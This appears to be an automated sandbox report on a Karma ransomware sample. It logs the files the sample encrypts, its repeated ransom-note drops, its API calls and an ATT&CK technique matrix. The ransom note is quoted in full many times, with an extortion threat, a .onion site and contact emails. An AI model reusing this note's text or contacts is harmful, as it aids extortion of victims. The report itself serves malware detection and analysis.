Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\documents\zggknsukop\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\downloads\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\downloads\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\favorites\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\favorites\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\favorites\links\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\favorites\links\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\links\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\links\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\cache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\acrobat\dc\cache\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\profiles\karma-encrypted.txtJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile created: c:\documents and settings\user\local settings\adobe\color\profiles\karma-encrypted.txtJump to behavior
Writes many files with high entropy
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei entropy: 7.99229627993Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl entropy: 7.99941171636Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL entropy: 7.9993492267Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL entropy: 7.9993747625Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL entropy: 7.99925606475Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL entropy: 7.9993838274Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl entropy: 7.99924388202Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl entropy: 7.99948781185Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL entropy: 7.9991112055Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL entropy: 7.99906080498Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl entropy: 7.99936425566Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL entropy: 7.99938995309Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL entropy: 7.99950474381Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx entropy: 7.99991264152Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\MMC\services entropy: 7.99788439229Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl entropy: 7.9947616583Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm entropy: 7.99013163613Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst entropy: 7.99876908693Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat entropy: 7.99918756717Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin entropy: 7.99662078948Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Security\ES_session_storei.KARMA (copy) entropy: 7.99229627993Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.KARMA (copy) entropy: 7.99941171636Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\CHICAGO.XSL.KARMA (copy) entropy: 7.9993492267Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GB.XSL.KARMA (copy) entropy: 7.9993747625Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostName.XSL.KARMA (copy) entropy: 7.99925606475Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\GostTitle.XSL.KARMA (copy) entropy: 7.9993838274Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl.KARMA (copy) entropy: 7.99924388202Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl.KARMA (copy) entropy: 7.99948781185Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690.XSL.KARMA (copy) entropy: 7.9991112055Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\ISO690Nmerical.XSL.KARMA (copy) entropy: 7.99906080498Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.KARMA (copy) entropy: 7.99936425566Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.KARMA (copy) entropy: 7.99938995309Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.KARMA (copy) entropy: 7.99950474381Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx.KARMA (copy) entropy: 7.99991264152Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\MMC\services.KARMA (copy) entropy: 7.99788439229Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Office\MSO1033.acl.KARMA (copy) entropy: 7.9947616583Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Application Data\Microsoft\Templates\Normal.dotm.KARMA (copy) entropy: 7.99013163613Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\AdobeSysFnt19.lst.KARMA (copy) entropy: 7.99876908693Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheRdr65536.dat.KARMA (copy) entropy: 7.99918756717Jump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile created: C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\UserCache.bin.KARMA (copy) entropy: 7.99662078948Jump to dropped file
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\3D Objects\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\Adobe\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Source: C:\Users\user\Desktop\pss.exeFile dropped: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\KARMA-ENCRYPTED.txt -> decryption is only possible with a private key that only we posses.our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise.scamming is just bad for business in this line of work.contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded.we advise you not to use any data recovery tools without leaving copies of the initial encrypted file.you are risking irreversibly damaging the file by doing this. if we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website.http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/if a ransom is payed we will provide the decryption key and proof that we deleted you data.when you contact us we will provide you proof that we can decrypt your files and that we have downloaded your data.how to contact us:vincegilbert@tutanota.comjerseysmith1986@oniJump to dropped file
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\pss.exeFile moved: C:\Users\user\Desktop\NVWZAPQSQL.pdfJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile deleted: C:\Users\user\Desktop\NVWZAPQSQL.pdfJump to behavior
Source: C:\Users\user\Desktop\pss.exeFile moved: C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile deleted: C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile moved: C:\Users\user\Desktop\SQSJKEBWDT.jpgJump to behavior
Source: pss.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\pss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402D300_2_00402D30
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_004037800_2_00403780
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_004015A00_2_004015A0
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_004036A00_2_004036A0
Source: pss.exeVirustotal: Detection: 49%
Source: pss.exeReversingLabs: Detection: 45%
Source: pss.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pss.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\pss.exe 'C:\Users\user\Desktop\pss.exe'
Source: C:\Users\user\Desktop\pss.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 400
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3296
Source: C:\Users\user\Desktop\pss.exeMutant created: \Sessions\1\BaseNamedObjects\KARMA
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertReadJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C32.tmpJump to behavior
Source: classification engineClassification label: mal68.rans.evad.winEXE@3/386@0/0
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: pss.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402760 CreateFileW,GetFileSizeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LoadLibraryW,GetProcAddress,SetFilePointerEx,SetLastError,WriteFile,GetLastError,GetLastError,GetLastError,SetFilePointerEx,WriteFile,GetProcessHeap,HeapAlloc,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindCloseChangeNotification,MoveFileW,GetProcessHeap,RtlAllocateHeap,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,RtlFreeHeap,0_2_00402760
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402D30 CreateFileW,WriteFile,FindCloseChangeNotification,FindFirstFileW,FindNextFileW,FindClose,0_2_00402D30
Source: C:\Users\user\Desktop\pss.exeAPI call chain: ExitProcess graph end nodegraph_0-791
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\3D Objects\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Acrobat\DC\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeFile opened: C:\Documents and Settings\user\Application Data\Adobe\Jump to behavior
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_00402760 CreateFileW,GetFileSizeEx,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LoadLibraryW,GetProcAddress,SetFilePointerEx,SetLastError,WriteFile,GetLastError,GetLastError,GetLastError,SetFilePointerEx,WriteFile,GetProcessHeap,HeapAlloc,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindCloseChangeNotification,MoveFileW,GetProcessHeap,RtlAllocateHeap,SetFilePointerEx,ReadFile,SetFilePointerEx,WriteFile,GetProcessHeap,RtlFreeHeap,0_2_00402760
Source: C:\Users\user\Desktop\pss.exeCode function: 0_2_004035D0 GetDriveTypeW,GetProcessHeap,HeapAlloc,CreateThread,Sleep,WaitForSingleObject,WaitForSingleObject,0_2_004035D0
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Progman
Source: pss.exe, 00000000.00000000.218190757.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Native API1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Replication Through Removable Media1Screen Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact2
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryProcess Discovery1Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothProxy1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerPeripheral Device Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
